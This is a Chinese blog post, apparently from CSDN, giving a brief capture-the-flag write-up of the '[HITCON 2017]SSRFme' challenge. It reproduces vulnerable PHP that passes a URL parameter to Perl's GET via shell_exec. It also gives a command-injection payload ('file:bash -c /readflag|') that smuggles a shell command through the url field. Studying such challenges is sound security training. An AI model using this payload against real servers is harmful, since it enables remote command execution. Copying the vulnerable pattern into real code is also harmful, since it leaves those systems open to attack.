NO.3-16 [HITCON 2017]SSRFme

最新推荐文章于 2023-02-27 11:17:38 发布
最新推荐文章于 2023-02-27 11:17:38 发布
阅读量115 收藏
点赞数
分类专栏: 其他 BUUCTF
原文链接:https://www.jianshu.com/p/3f82685f56a8
版权

文章目录

    知识点
    新学会的函数
    代码审计

知识点

perl脚本GET open命令漏洞

GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理

open存在命令执行,并且还支持file函数

新学会的函数

pathinfo

代码审计

前面的代码返回了我的ip,和orange一起进行md5加密。通过url参数输入的内容会以GET命令执行,
命令执行的结果会被存入我们以filename参数的值命名的文件里

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

尝试读取根目录,并创建文件名为abc的文件


看出应该要用readflag读取flag,构造payload?url=file:bash -c /readflag|&filename=123


详细解析:

https://www.jianshu.com/p/3f82685f56a8

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
[HITCON 2017]SSRFmeperl脚本中get命令执行漏洞
记录学习,一起进步
01-28 831
[HITCON 2017]SSRFmeperl脚本中get命令执行漏洞
buuctf13(perl脚本GET open命令漏洞&redis主从复制&xss&ssti关键字过滤绕过&csrf)
weixin_63231007的博客
02-27 1119
[HITCON 2017]SSRFme & [网鼎杯 2020 玄武组]SSRFMe & [GWCTF 2019]mypassword & [GWCTF 2019]你的名字& [GKCTF 2021]CheckBot
perl脚本中GET命令执行漏洞([HITCON 2017]SSRFme
qq_45521281的博客
04-30 2907
GET命令执行漏洞 思路来自于HITCON2017中的ssrfme,考点是GET的任意命令执行。代码很简单,调用命令GET来执行从url获取的参数, 然后按照filename新建文件,写入GET的结果。 我不知道关于这个问题最早是什么时候爆出的了,但确实已经很多年了。 root@iZ285ei82c1Z:~/test# cat a.pl open(FD, "|id"); print <FD...
buuctf [HITCON 2017]SSRFme
qq_52671379的博客
04-19 524
buuctf [HITCON 2017]SSRFme
[HITCON 2017]SSRFme
m0_53314778的博客
03-06 406
考点: 代码审计 SSRF 知识点 perl脚本GET open命令漏洞 GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理 open存在命令执行,并且还支持file函数 pathinfo() 函数 进入环境审一下代码: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
HITCON-Badge:HITCON徽章相关文件
04-29
(非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的硬盘。 用作...
HITCON-ZeroDay年度报告.pdf
08-28
HITCON-ZeroDay年度报告》是一份由台湾黑客协会HITCON组织发布的年度安全研究报告,重点关注了安全研究、安全开发以及渗透测试等领域。该报告的发布旨在促进安全专家与企业之间的沟通与合作,共同营造一个良好的...
台灣駭客年會 HITCON CMT 2017 - 安全技术资料汇总(共3份).zip
02-06
Breaking_into_the_iCloud_Keychain.pdf CSCS_以技術力協助公民社會的初次嘗試.pdf 臺灣資安人才教育_Cybersecurity_Education_in_Taiwan.pdf
一天一道ctf 第54天(GET open任意执行漏洞
scrawman的博客
08-16 384
[HITCON 2017]SSRFme <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $s
[BUUCTF][HITCON 2017]SSRFme
Y4tacker的博客
10-03 6050
文章目录知识点新学会的函数代码审计 知识点 perl脚本GET open命令漏洞 GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理 open存在命令执行,并且还支持file函数 新学会的函数 pathinfo 代码审计 前面的代码返回了我的ip,和orange一起进行md5加密。通过url参数输入的内容会以GET命令执行, 命令执行的结果会被存入我们以filename参数的值命名的文件里 <?php if (isset
[HITCON 2017]SSRFme ctf web buuctf
wuyaowangchuan的博客
11-12 508
<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $sandbox = "sandbox/..
2017 hitcon Ssrf_me 详解 (perl脚本中GET open漏洞及解析漏洞
a3320315的博客
12-15 1870
0x01 源码 http://117.50.3.97:8004/ <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapesh...
BUU-WEB-[HITCON 2017]SSRFme
qq_24033605的博客
05-24 205
[HITCON 2017]SSRFme <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $
[BUUCTF]SSRF Me
Dannie01的博客
10-10 355
perl get 命令执行漏洞 思路: 调用命令GET来执行从url获取的参数, 然后按照filename新建文件,写入GET的结果。 知识点: bash -c “cmd string” 命令 perl脚本GET open命令漏洞 GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理 open存在命令执行,并且还支持file函数 先创123文件查看根目录 创建 poc1 ?url=/&filename=123 p
BMZCTF:hitcon_2017_ssrfme
末初的CSDN博客
01-25 725
http://bmzclub.cn/challenges#hitcon_2017_ssrfme <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pat
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值